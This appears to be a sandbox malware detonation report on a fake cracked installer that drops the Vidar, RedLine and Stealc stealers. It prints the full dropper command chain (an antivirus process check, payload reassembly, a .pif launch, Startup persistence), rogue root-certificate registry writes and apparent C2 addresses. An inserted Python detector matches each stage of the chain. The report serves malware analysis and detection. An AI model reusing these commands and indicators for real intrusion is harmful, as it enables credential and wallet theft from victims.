Max time kernel
253s
Max time network
146s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1712 created 1328 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | C:\Windows\Explorer.EXE |
| PID 1712 created 1328 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | C:\Windows\Explorer.EXE |
Vidar
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = … | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6579758,0x7fef6579768,0x7fef6579778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2236 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1796 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\" -spe -an -ai#7zMap5309:146:7zEvent20005
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\" -spe -an -ai#7zMap31036:228:7zEvent23439
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Reprint Reprint.cmd & Reprint.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 55206725
C:\Windows\SysWOW64\findstr.exe
findstr /V "pastinvitationinformalimproving" Does
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Bikini + Relief + Fw + Maximize + Bases 55206725\q
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif
55206725\Announcement.pif 55206725\q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\LynxChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & exit
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Broken Broken.cmd & Broken.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 1181
C:\Windows\SysWOW64\findstr.exe
findstr /V "BluesAlgeriaDefinedIntersection" Pressed
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Breakfast + Dinner + Steven 1181\Q
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif
1181\Equivalent.pif 1181\Q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe"
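The process list shows the same batch-driven unpacking chain twice (Setup.exe and Crack.exe): an extension-less dropped file is renamed to .cmd and run, tasklist output is piped through findstr for security products, a numbered working directory is created, findstr /V strips decoy lines from another extension-less file, several chunks are concatenated with copy /b into the script payload, a .pif in the browser cache directory is launched with that payload, a loop-back ping serves as a sleep, and a .url pointing at a .js under AppData is written into the Startup folder. The detector below is an added example, not one of the sandbox's signatures: it runs each of those stages as a rule over process-creation events and grades the chain by how many distinct stages appear. The events are constructed from the command lines above with made-up PIDs, and the triage thresholds are an assumption to be tuned.

```python
import re
from typing import Dict, List

# Security products the dropper looks for before unpacking, taken from the
# findstr command lines in the process list above.
AV_PROCESSES = {"wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
                "nswscsvc.exe", "sophoshealth.exe"}

# One regex per stage of the batch chain, keyed by finding name.
PATTERNS = {
    # extension-less dropped file renamed to .cmd and executed on one line
    "rename_and_run_cmd": re.compile(r"\bmove\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd", re.I),
    # findstr /V "<junk marker>" <file>: drops decoy lines to rebuild a payload
    "findstr_v_strip": re.compile(r'\bfindstr\s+/V\s+"[^"]+"\s+\S+', re.I),
    # binary concatenation of chunks into the numbered working directory
    "copy_b_reassembly": re.compile(r"\bcopy\s+/b\s+(\S+(?:\s*\+\s*\S+)+)\s+(\S+)", re.I),
    # loop-back ping used as a sleep between stages
    "ping_sleep": re.compile(r"\bping\s+-n\s+\d+\s+127\.0\.0\.1", re.I),
    # .url written into the per-user Startup folder by echo redirection
    "startup_url_persistence": re.compile(
        r'echo\s+\[InternetShortcut\]\s*>\s*"?([^"&]*\\Start Menu\\Programs\\Startup\\[^"&]*)',
        re.I),
}
AV_CHECK = re.compile(r'\bfindstr\s+/I\s+"([^"]+)"', re.I)
CACHE_DIRS = ("\\inetcache\\", "\\temporary internet files\\")


def detect(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """One finding per (event, stage) match; events carry pid, image, cmdline."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        cmd = str(ev["cmdline"])
        image = str(ev["image"]).lower()
        for name, rx in PATTERNS.items():
            m = rx.search(cmd)
            if m:
                findings.append({"pid": ev["pid"], "rule": name, "detail": m.group(0)})
        m = AV_CHECK.search(cmd)
        if m:
            hits = sorted(t.lower() for t in m.group(1).split() if t.lower() in AV_PROCESSES)
            if hits:
                findings.append({"pid": ev["pid"], "rule": "av_process_check",
                                 "detail": ", ".join(hits)})
        # renamed interpreter (.pif) launched out of the browser cache directory
        if image.endswith(".pif") and any(d in image for d in CACHE_DIRS):
            findings.append({"pid": ev["pid"], "rule": "pif_from_cache",
                             "detail": str(ev["image"])})
    return findings


def triage(findings: List[Dict[str, object]]) -> str:
    """Grade by distinct stages seen; thresholds are an assumption, tune them."""
    stages = {f["rule"] for f in findings}
    if len(stages) >= 4:
        return "high"
    if len(stages) >= 2:
        return "medium"
    return "low" if stages else "none"


# Constructed events: command lines from the process list above, PIDs invented.
TIF = r"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files"
SAMPLE_EVENTS = [
    {"pid": 100, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k move Reprint Reprint.cmd & Reprint.cmd & exit'},
    {"pid": 101, "image": r"C:\Windows\SysWOW64\tasklist.exe", "cmdline": "tasklist"},
    {"pid": 102, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": 'findstr /I "wrsa.exe opssvc.exe"'},
    {"pid": 103, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": 'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"'},
    {"pid": 104, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": "cmd /c md 55206725"},
    {"pid": 105, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": 'findstr /V "pastinvitationinformalimproving" Does'},
    {"pid": 106, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c copy /b Bikini + Relief + Fw + Maximize + Bases 55206725\q"},
    {"pid": 107, "image": TIF + r"\55206725\Announcement.pif",
     "cmdline": r"55206725\Announcement.pif 55206725\q"},
    {"pid": 108, "image": r"C:\Windows\SysWOW64\PING.EXE", "cmdline": "ping -n 5 127.0.0.1"},
    {"pid": 109, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\LynxChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & exit'},
    # benign control: a Chrome renderer line from the same process list
    {"pid": 110, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US'},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(h["pid"], h["rule"], h["detail"][:60])
    print("triage:", triage(hits))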
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | KUZLiTEaapNEWFMhPiGnHQGgq.KUZLiTEaapNEWFMhPiGnHQGgq | udp |
| US | 8.8.8.8:53 | BDMkHBPzrNwUIRfHIVtQKUDid.BDMkHBPzrNwUIRfHIVtQKUDid | udp |
| UA | 45.89.53.206:4663 | N/A | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-09 13:02
Reported
2024-05-09 13:07
Platform
win10v2004-20240508-ja
Max time kernel
247s
Max time network
247s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133597333800877944" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
